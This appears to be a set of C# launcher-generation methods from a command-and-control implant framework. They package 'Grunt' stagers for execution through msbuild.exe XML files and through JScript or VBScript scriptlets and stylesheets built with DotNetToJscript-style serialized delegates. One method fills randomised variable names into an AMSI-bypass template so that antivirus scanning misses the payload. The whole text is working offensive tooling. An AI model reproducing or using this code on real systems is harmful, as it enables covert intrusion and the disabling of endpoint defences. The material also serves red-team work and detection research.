public override string GetLauncher(string StagerCode, byte[] StagerAssembly, Grunt grunt, ImplantTemplate template) { this.StagerCode = StagerCode; this.Base64ILByteString = Convert.ToBase64String(StagerAssembly); this.DiskCode = XMLTemplate.Replace("{{GRUNT_IL_BYTE_STRING}}", this.Base64ILByteString); this.DiskCode = DiskCode.Replace("{{TARGET_NAME}}", this.TargetName); this.DiskCode = DiskCode.Replace("{{TASK_NAME}}", this.TaskName); // Replacements for obfuscation this.DiskCode = DiskCode.Replace("{{PATCH_AMSI}}", this.random_var_patchAmsi); this.DiskCode = DiskCode.Replace("{{AMSI}}", this.random_var_amsi); this.DiskCode = DiskCode.Replace("{{MEMORY_STREAM}}", this.random_var_outputMemoryStream); this.DiskCode = DiskCode.Replace("{{DEFLATE_STREAM}}", this.random_var_deflateStream); this.DiskCode = DiskCode.Replace("{{BYTE_ARRAY}}", this.random_var_byteArray); this.DiskCode = DiskCode.Replace("{{READ}}", this.random_var_read); this.DiskCode = DiskCode.Replace("{{LIB}}", this.random_var_lib); this.DiskCode = DiskCode.Replace("{{AMSI_DLL_0}}", this.random_var_amsi_dll[0]); this.DiskCode = DiskCode.Replace("{{AMSI_DLL_1}}", this.random_var_amsi_dll[1]); this.DiskCode = DiskCode.Replace("{{AMSI_SCAN_BUFF_0}}", this.random_var_amsiScanBuffer[0]); this.DiskCode = DiskCode.Replace("{{AMSI_SCAN_BUFF_1}}", this.random_var_amsiScanBuffer[1]); this.DiskCode = DiskCode.Replace("{{AMSI_SCAN_BUFF_2}}", this.random_var_amsiScanBuffer[2]); this.DiskCode = DiskCode.Replace("{{ASSEMBLY_BUFFER}}", this.random_var_assemblyBuffer); string launcher = "msbuild.exe" + " " + template.Name + ".xml"; this.LauncherString = launcher; return(this.LauncherString); }
public override string GetLauncher(Listener listener, Grunt grunt, HttpProfile profile) { this.StagerCode = listener.GetGruntStagerCode(grunt, profile); this.Base64ILByteString = listener.CompileGruntStagerCode(grunt, profile, this.OutputKind, true); this.DiskCode = XMLTemplate.Replace("{{GRUNT_IL_BYTE_STRING}}", this.Base64ILByteString); this.DiskCode = DiskCode.Replace("{{TARGET_NAME}}", this.TargetName); this.DiskCode = DiskCode.Replace("{{TASK_NAME}}", this.TaskName); string launcher = "msbuild.exe" + " " + "file.xml"; this.LauncherString = launcher; return(this.LauncherString); }
public override string GetLauncher(string StagerCode, byte[] StagerAssembly, Grunt grunt, ImplantTemplate template) { this.StagerCode = StagerCode; this.Base64ILByteString = Convert.ToBase64String(StagerAssembly); this.DiskCode = XMLTemplate.Replace("{{GRUNT_IL_BYTE_STRING}}", this.Base64ILByteString); this.DiskCode = DiskCode.Replace("{{TARGET_NAME}}", this.TargetName); this.DiskCode = DiskCode.Replace("{{TASK_NAME}}", this.TaskName); string launcher = "msbuild.exe" + " " + "file.xml"; this.LauncherString = launcher; return(this.LauncherString); }
public override string GetLauncher(Listener listener, Grunt grunt, HttpProfile profile) { this.StagerCode = listener.GetGruntStagerCode(grunt, profile); this.Base64ILByteString = listener.CompileGruntStagerCode(grunt, profile, this.OutputKind, false); // Credit DotNetToJscript (tyranid - James Forshaw) byte[] serializedDelegate = Convert.FromBase64String(FrontBinaryFormattedDelegate).Concat(Convert.FromBase64String(this.Base64ILByteString)).Concat(Convert.FromBase64String(EndBinaryFormattedDelegate)).ToArray(); int ofs = serializedDelegate.Length % 3; if (ofs != 0) { int length = serializedDelegate.Length + (3 - ofs); Array.Resize(ref serializedDelegate, length); } string base64Delegate = Convert.ToBase64String(serializedDelegate); int lineLength = 80; List <String> splitString = new List <String>(); for (int i = 0; i < base64Delegate.Length; i += lineLength) { splitString.Add(base64Delegate.Substring(i, Math.Min(lineLength, base64Delegate.Length - i))); } string language = ""; string code = ""; if (this.ScriptLanguage == ScriptingLanguage.JScript) { string DelegateBlock = String.Join("\"+\r\n\"", splitString.ToArray()); code = JScriptTemplate.Replace(Environment.NewLine, "\r\n").Replace("{{REPLACE_GRUNT_IL_BYTE_STRING}}", DelegateBlock); language = "JScript"; } else if (this.ScriptLanguage == ScriptingLanguage.VBScript) { string DelegateBlock = String.Join("\"\r\ns = s & \"", splitString.ToArray()); code = VBScriptTemplate.Replace(Environment.NewLine, "\r\n").Replace("{{REPLACE_GRUNT_IL_BYTE_STRING}}", DelegateBlock); if (this.ScriptType == ScriptletType.Stylesheet) { code = "<![CDATA[\r\n" + code + "\r\n]]>"; } language = "VBScript"; } if (this.ScriptType == ScriptletType.Plain) { this.DiskCode = code; } else if (this.ScriptType == ScriptletType.Scriptlet || this.ScriptType == ScriptletType.TaggedScript) { string TaggedScript = TaggedScriptTemplate.Replace(Environment.NewLine, "\r\n").Replace("{{REPLACE_SCRIPT_LANGUAGE}}", language); TaggedScript = TaggedScript.Replace("{{REPLACE_SCRIPT}}", code); if (this.ScriptType == ScriptletType.TaggedScript) { this.DiskCode = TaggedScript; } else { this.DiskCode = ScriptletCodeTemplate.Replace(Environment.NewLine, "\r\n").Replace("{{REPLACE_TAGGED_SCRIPT}}", TaggedScript).Replace("{{REPLACE_PROGID}}", this.ProgId); } } else if (this.ScriptType == ScriptletType.Stylesheet) { this.DiskCode = StylesheetCodeTemplate.Replace(Environment.NewLine, "\r\n").Replace("{{REPLACE_SCRIPT_LANGUAGE}}", language); this.DiskCode = DiskCode.Replace("{{REPLACE_SCRIPT}}", code); } if (this.DotNetFrameworkVersion == Common.DotNetVersion.Net35) { this.DiskCode = this.DiskCode.Replace("{{REPLACE_VERSION_SETTER}}", ""); } else if (this.DotNetFrameworkVersion == Common.DotNetVersion.Net40) { this.DiskCode = this.DiskCode.Replace("{{REPLACE_VERSION_SETTER}}", JScriptNet40VersionSetter); } return(GetLauncher(this.DiskCode)); }